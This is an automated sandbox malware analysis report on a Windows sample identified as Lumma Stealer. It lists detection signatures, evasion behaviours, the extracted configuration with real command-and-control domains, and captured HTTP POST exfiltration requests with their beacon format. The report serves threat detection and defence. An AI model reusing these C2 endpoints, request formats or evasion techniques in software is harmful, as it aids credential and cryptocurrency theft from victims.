Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NAliwxUTJ4.exe

Overview

General Information

Sample name:NAliwxUTJ4.exe
renamed because original name is a hash value
Original sample name:0a678f4e43e83079c1e95517f576a88d.exe
Analysis ID:1578940
MD5:0a678f4e43e83079c1e95517f576a88d
SHA1:4012a39b2f700273402d3adbc54f0f87eac2fa56
SHA256:6b17962e6298e3118f5301af6bdceccbf3c79663e4a526e128a5c306a232bc01
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • NAliwxUTJ4.exe (PID: 828 cmdline: "C:\Users\user\Desktop\NAliwxUTJ4.exe" MD5: 0A678F4E43E83079C1E95517F576A88D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": "https://discokeyus.lat/api", "Build Version": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: NAliwxUTJ4.exe PID: 828JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: NAliwxUTJ4.exe PID: 828JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: NAliwxUTJ4.exe PID: 828JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:45.988644+010020283713Unknown Traffic192.168.2.649716104.21.21.99443TCP
              2024-12-20T16:55:49.316014+010020283713Unknown Traffic192.168.2.649718104.21.21.99443TCP
              2024-12-20T16:55:51.829517+010020283713Unknown Traffic192.168.2.649719104.21.21.99443TCP
              2024-12-20T16:55:54.160731+010020283713Unknown Traffic192.168.2.649721104.21.21.99443TCP
              2024-12-20T16:55:57.164911+010020283713Unknown Traffic192.168.2.649723104.21.21.99443TCP
              2024-12-20T16:56:00.318496+010020283713Unknown Traffic192.168.2.649726104.21.21.99443TCP
              2024-12-20T16:56:02.993587+010020283713Unknown Traffic192.168.2.649729104.21.21.99443TCP
              2024-12-20T16:56:07.187800+010020283713Unknown Traffic192.168.2.649730104.21.21.99443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:47.721915+010020546531A Network Trojan was detected192.168.2.649716104.21.21.99443TCP
              2024-12-20T16:55:50.075795+010020546531A Network Trojan was detected192.168.2.649718104.21.21.99443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:47.721915+010020498361A Network Trojan was detected192.168.2.649716104.21.21.99443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:50.075795+010020498121A Network Trojan was detected192.168.2.649718104.21.21.99443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:45.988644+010020583611Domain Observed Used for C2 Detected192.168.2.649716104.21.21.99443TCP
              2024-12-20T16:55:49.316014+010020583611Domain Observed Used for C2 Detected192.168.2.649718104.21.21.99443TCP
              2024-12-20T16:55:51.829517+010020583611Domain Observed Used for C2 Detected192.168.2.649719104.21.21.99443TCP
              2024-12-20T16:55:54.160731+010020583611Domain Observed Used for C2 Detected192.168.2.649721104.21.21.99443TCP
              2024-12-20T16:55:57.164911+010020583611Domain Observed Used for C2 Detected192.168.2.649723104.21.21.99443TCP
              2024-12-20T16:56:00.318496+010020583611Domain Observed Used for C2 Detected192.168.2.649726104.21.21.99443TCP
              2024-12-20T16:56:02.993587+010020583611Domain Observed Used for C2 Detected192.168.2.649729104.21.21.99443TCP
              2024-12-20T16:56:07.187800+010020583611Domain Observed Used for C2 Detected192.168.2.649730104.21.21.99443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:44.125790+010020583601Domain Observed Used for C2 Detected192.168.2.6634351.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:43.929541+010020583641Domain Observed Used for C2 Detected192.168.2.6644951.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:55:43.732478+010020583781Domain Observed Used for C2 Detected192.168.2.6584621.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:56:01.110822+010020480941Malware Command and Control Activity Detected192.168.2.649726104.21.21.99443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T16:56:03.034655+010028438641A Network Trojan was detected192.168.2.649729104.21.21.99443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: NAliwxUTJ4.exeAvira: detected
              Found malware configuration
              Source: 00000001.00000003.2673918520.00000000054C3000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "https://discokeyus.lat/api", "Build Version": "PsFKDg--pablo"}
              Multi AV Scanner detection for submitted file
              Source: NAliwxUTJ4.exeReversingLabs: Detection: 60%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: NAliwxUTJ4.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: sweepyribs.lat
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
              Source: NAliwxUTJ4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49729 version: TLS 1.2
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: number of queries: 1001

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:58462 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:64495 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49719 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49721 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.6:63435 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49723 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49718 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49729 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49730 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49716 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49726 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49716 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49718 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49726 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49729 -> 104.21.21.99:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://discokeyus.lat/api
              Source: Joe Sandbox ViewIP Address: 104.21.21.99 104.21.21.99
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49723 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49729 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.21.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49726 -> 104.21.21.99:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5FO31SHX5ZUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12817Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L8WUA7W76SOR97JQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15093Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EQ0XRQAPW21User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19921Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=861PTFRQQ7MWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1217Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QIGSWE36PS2VX4NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552861Host: discokeyus.lat
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
              Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: NAliwxUTJ4.exe, 00000001.00000003.2648298445.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673811023.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
              Source: NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/J
              Source: NAliwxUTJ4.exe, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2607886558.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688281522.00000000054C1000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2639157028.00000000054C5000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647901427.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726834130.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688428313.00000000054A5000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2640359050.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648543272.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669757104.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2727028041.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688082544.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673918520.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
              Source: NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiak
              Source: NAliwxUTJ4.exe, 00000001.00000003.2647901427.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2639237104.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiu
              Source: NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/g$
              Source: NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/q_2
